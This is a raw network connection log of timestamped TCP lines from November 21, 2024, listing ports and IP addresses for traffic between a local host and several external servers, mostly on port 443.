                                                                                                                                                                                                            Nov 21, 2024 15:17:47.595093966 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.595134020 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.595207930 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.595863104 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.595879078 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597429037 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597501040 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597780943 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597817898 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597817898 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597834110 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.597845078 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.600152969 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.600251913 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.600579023 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.600718975 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.600756884 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.635701895 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.635720968 CET443498212.23.209.193192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.636051893 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.636051893 CET49821443192.168.2.62.23.209.193
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.647794962 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.647833109 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.648094893 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.648247957 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.648262978 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864341021 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864367962 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864417076 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864432096 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864444017 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864476919 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864485025 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.864518881 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.868720055 CET49822443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:47.868730068 CET4434982220.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.784374952 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.784411907 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.784487009 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.784769058 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.784782887 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.925983906 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.926445961 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.926466942 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.926925898 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:48.926930904 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.182421923 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.182485104 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.182895899 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.182910919 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.183440924 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.183445930 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.214999914 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.215476036 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.215500116 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.216218948 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.216224909 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.283251047 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.283792019 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.283830881 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.284316063 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.284321070 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383280993 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383460999 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383681059 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383708000 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383718014 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383732080 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.383737087 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.386248112 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.386280060 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.386452913 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.386603117 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.386616945 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.388449907 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.388889074 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.388916016 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.389827967 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.389832973 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.479805946 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.481559992 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.481585026 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.482091904 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.482096910 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.680835009 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.680922031 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.680942059 CET44349831150.171.27.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.680986881 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.681044102 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.681044102 CET49831443192.168.2.6150.171.27.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.798451900 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.798557997 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.801479101 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.807876110 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.807938099 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.808268070 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.809277058 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.809298992 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.809312105 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.809318066 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.811589956 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.811604023 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.811634064 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.811640024 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.815254927 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.815289974 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.815351963 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.815974951 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.815990925 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.834054947 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.834131956 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.834852934 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.836251974 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.836251974 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.836282015 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.836304903 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.837701082 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.837728024 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.837809086 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.838054895 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.838064909 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.842211008 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.842240095 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.842334032 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.842550039 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.842565060 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.938133001 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.938236952 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.941543102 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.985944033 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.985987902 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.997258902 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.997291088 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.997385025 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.997828007 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:49.997840881 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.222398996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.274626970 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.274869919 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.274888992 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.276376963 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.276448011 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.277692080 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.277775049 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.319355965 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.319365978 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:50.365164995 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.107259989 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.107897997 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.107949972 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.108622074 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.108633041 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.549055099 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.549081087 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.549145937 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.549163103 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.549212933 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.558099985 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.558121920 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.558137894 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.558145046 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.561633110 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.561670065 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.561996937 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.562278986 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.562295914 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.562453032 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.562849045 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.562863111 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.563561916 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.563566923 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.599014044 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.599659920 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.599690914 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.600156069 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.600164890 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.685125113 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.685712099 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.685749054 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.686384916 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.686392069 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.756584883 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.756620884 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.757010937 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.757523060 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.757540941 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.759934902 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.759973049 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.760320902 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.768414021 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.768435001 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.779006958 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.779490948 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.779517889 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.780625105 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:51.780630112 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.128938913 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129014015 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129215002 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129256964 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129256964 CET49837443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129280090 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.129292011 CET4434983713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.131975889 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.132019997 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.132128954 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.132260084 CET49847443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.132273912 CET4434984713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.144478083 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.144496918 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.144561052 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.144581079 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145083904 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145083904 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145106077 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145256996 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145289898 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.145446062 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.148164034 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.148189068 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.148255110 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.148441076 CET49848443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.148452044 CET4434984813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.257646084 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.257808924 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.257874012 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.258634090 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.258651972 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.258692026 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.258708954 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.262106895 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.262165070 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.262326956 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.262480974 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.262495041 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.304068089 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.304092884 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.304146051 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.304163933 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.304267883 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305124998 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305130005 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305246115 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305320978 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305361032 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.305430889 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.307929039 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.307956934 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.308079004 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.308283091 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:52.308295012 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.469782114 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.472959995 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.472978115 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.473428011 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.473433971 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.591727018 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.592065096 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.592080116 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.593501091 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.593559980 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.595514059 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.595649958 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.595762014 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.595767975 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.640469074 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.670048952 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.670306921 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.670331001 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.671389103 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.671442986 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.673624039 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.673691034 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.673816919 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.715327978 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.717577934 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.717590094 CET4434984513.107.246.44192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.763845921 CET49845443192.168.2.613.107.246.44
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.926444054 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.926476955 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.926548004 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.926572084 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.928581953 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.928642988 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:53.931621075 CET4434984813.107.246.45192.168.2.6
